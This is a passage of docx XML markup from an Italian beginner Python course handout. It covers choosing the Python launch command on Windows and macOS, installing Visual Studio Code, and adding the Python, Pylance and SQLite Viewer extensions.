        <w:t xml:space="preserve">py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al posto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per il resto del corso. Se non funziona, vai in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Impostazioni → App → Alias di esecuzione app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e disattiva i due alias chiamati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">python.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">python3.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, poi riapri il terminale e ritenta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su macOS, se vedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 2.7.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(versione 2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Il sistema sta usando il Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">obsoleto. Usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per il resto del corso, userai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al posto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Da qui in avanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, quando in questa dispensa scrivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, intendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il comando per lanciare Python sul tuo sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Su Windows può essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Su macOS quasi sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Adatta tu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="36" w:name="installare-visual-studio-code"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="sec_0_4"/>
      <w:r>
        <w:t xml:space="preserve">0.4 Installare Visual Studio Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="cosè-vs-code"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è VS Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Visual Studio Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(abbreviato in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">VS Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è un editor di testo specializzato per la programmazione. La differenza con un editor normale (tipo Blocco Note) è che VS Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">colora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il codice in modo che le parti diverse (parole chiave, stringhe, commenti) si distinguano a colpo d’occhio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">suggerisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automaticamente i nomi delle funzioni mentre scrivi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">avverte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se hai sbagliato la sintassi prima ancora di eseguire il codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ha un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">terminale integrato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, così non devi tenere due finestre aperte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">può essere esteso con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">estensioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che aggiungono funzionalità per linguaggi specifici (Python, JavaScript, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È gratuito, lo sviluppa Microsoft, gira su Windows, macOS e Linux.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non confonderlo con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Visual Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(senza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), che è un altro prodotto, più pesante, più orientato a C# e .NET.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="installazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://code.visualstudio.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il sito riconosce automaticamente il tuo sistema operativo: clicca il pulsante blu di download.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: scarica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VSCodeUserSetup-x64-x.x.x.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e aprilo. Durante l’installazione lascia tutte le impostazioni predefinite, ma metti la spunta su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aggiungi a PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aggiungi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Apri con Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al menu contestuale dei file e delle cartelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(utile)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su macOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: scarica il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, scompattalo (doppio click), trascina l’icona di Visual Studio Code nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Applicazioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avvia VS Code. La prima volta vedrai una schermata di benvenuto. Chiudila pure: la riprenderai dopo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">finestra di VS Code aperta per la prima volta, con la schermata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Welcome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3239589"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_04_finestra_di_VS_Code_aperta_per_la_prima_volta_con_la_scherma.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3239589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="le-estensioni-che-ti-servono"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le estensioni che ti servono</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le estensioni di VS Code aggiungono funzionalità specifiche per ogni linguaggio. Ne installeremo due, entrambe ufficiali Microsoft, entrambe gratuite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In VS Code, sulla barra grigia a sinistra, clicca sull’icona dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quattro quadratini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la quarta dall’alto). Si apre il pannello</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la barra laterale di VS Code con l’icona Extensions cerchiata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3239589"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_05_la_barra_laterale_di_VS_Code_con_l_icona_Extensions_cerchiat.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3239589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nella casella di ricerca scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il primo risultato sarà l’estensione ufficiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Microsoft (riconoscibile dal nome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ms-python.python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e dal numero di download nell’ordine delle decine di milioni). Clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insieme alla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si installa automaticamente anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pylance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che è il motore di analisi del codice. Verifica che ci sia (cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pylance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella barra delle estensioni). Se per qualche motivo non c’è, installala manualmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cerca anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite Viewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(autore:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Florian Klampfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e installala. Ci servirà per dare un’occhiata veloce ai database direttamente dentro VS Code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso chiudi e riapri VS Code per essere sicuro che le estensioni siano attive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="38" w:name="la-tua-prima-cartella-di-lavoro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="sec_0_5"/>
      <w:r>
        <w:t xml:space="preserve">0.5 La tua prima cartella di lavoro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
